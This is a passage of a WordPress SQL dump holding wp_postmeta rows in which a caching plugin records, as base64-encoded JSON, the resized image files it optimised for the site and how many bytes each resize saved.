LCJpZCI6MTk4Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTItODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTItODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTItODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjM1NTIsInRpbWUiOjE0ODM1NDk1ODcsImlkIjoxOTg2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMi03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMi03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtMi03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MzIxMywidGltZSI6MTQ4MzU0OTU5MCwiaWQiOjE5ODZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0yLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMi0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS0yLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjE0NjE4LCJ0aW1lIjoxNDgzNTQ5NTk0LCJpZCI6MTk4Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTItMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTItMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjY0MSwidGltZSI6MTQ4MzU0OTU5OCwiaWQiOjE5ODZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0yLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0yLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS0yLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MzYsInRpbWUiOjE0ODM1NDk2MDEsImlkIjoxOTg2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtMi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NjI1LCJ0aW1lIjoxNDgzNTQ5NjA0LCJpZCI6MTk4Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTItNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTItNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjIxMzUsInRpbWUiOjE0ODM1NDk2MDgsImlkIjoxOTg2fV0='); 
INSERT INTO `wp_postmeta` VALUES (28892, 1985, 'wpfc_optimisation_reduction', '26389'); 
INSERT INTO `wp_postmeta` VALUES (28893, 1985, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0yLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0yLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NDk2MTIsImlkIjoiMTk4NSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0yLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0yLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0yLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxMDY5LCJ0aW1lIjoxNDgzNTQ5NjE2LCJpZCI6MTk4NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTItODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTItODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTItODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjM1NTIsInRpbWUiOjE0ODM1NDk2MjAsImlkIjoxOTg1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMi03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMi03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMi03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MzIxMywidGltZSI6MTQ4MzU0OTYyMywiaWQiOjE5ODV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0yLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMi0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0yLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjE0NjE4LCJ0aW1lIjoxNDgzNTQ5NjI3LCJpZCI6MTk4NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTItMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTItMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjY0MSwidGltZSI6MTQ4MzU0OTYzMCwiaWQiOjE5ODV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0yLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0yLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0yLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MzYsInRpbWUiOjE0ODM1NDk2MzQsImlkIjoxOTg1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NjI1LCJ0aW1lIjoxNDgzNTQ5NjM3LCJpZCI6MTk4NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTItNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTItNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjIxMzUsInRpbWUiOjE0ODM1NDk2NDEsImlkIjoxOTg1fV0='); 
INSERT INTO `wp_postmeta` VALUES (28894, 1984, 'wpfc_optimisation_reduction', '26389'); 
INSERT INTO `wp_postmeta` VALUES (28895, 1984, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0xLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0xLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NDk2NDUsImlkIjoiMTk4NCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0xLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0xLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0xLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxMDY5LCJ0aW1lIjoxNDgzNTQ5NjQ4LCJpZCI6MTk4NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTEtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTEtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTEtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjM1NTIsInRpbWUiOjE0ODM1NDk2NTEsImlkIjoxOTg0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMS03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMS03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MzIxMywidGltZSI6MTQ4MzU0OTY1NSwiaWQiOjE5ODR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0xLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0xLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjE0NjE4LCJ0aW1lIjoxNDgzNTQ5NjU4LCJpZCI6MTk4NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTEtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTEtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjY0MSwidGltZSI6MTQ4MzU0OTY2MiwiaWQiOjE5ODR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0xLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0xLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0xLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MzYsInRpbWUiOjE0ODM1NDk2NjUsImlkIjoxOTg0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NjI1LCJ0aW1lIjoxNDgzNTQ5NjY4LCJpZCI6MTk4NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTEtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTEtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTEtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjIxMzUsInRpbWUiOjE0ODM1NDk2NzEsImlkIjoxOTg0fV0='); 
INSERT INTO `wp_postmeta` VALUES (28896, 1969, 'wpfc_optimisation_reduction', '1752079'); 
INSERT INTO `wp_postmeta` VALUES (28897, 1969, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXBjYS1vaWwtMS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1wY2Etb2lsLTEuanBnIiwid2lkdGgiOjU3NjAsImhlaWdodCI6Mzg0MCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1wY2Etb2lsLTEuanBnIiwicmVkdWN0aW9uIjoxNzUyMDcwLCJ0aW1lIjoxNDgzNTQ5NjgzLCJpZCI6IjE5NjkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1wY2Etb2lsLTEtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtcGNhLW9pbC0xLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LXBjYS1vaWwtMS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0OTY4NiwiaWQiOjE5Njl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXBjYS1vaWwtMS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1wY2Etb2lsLTEtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd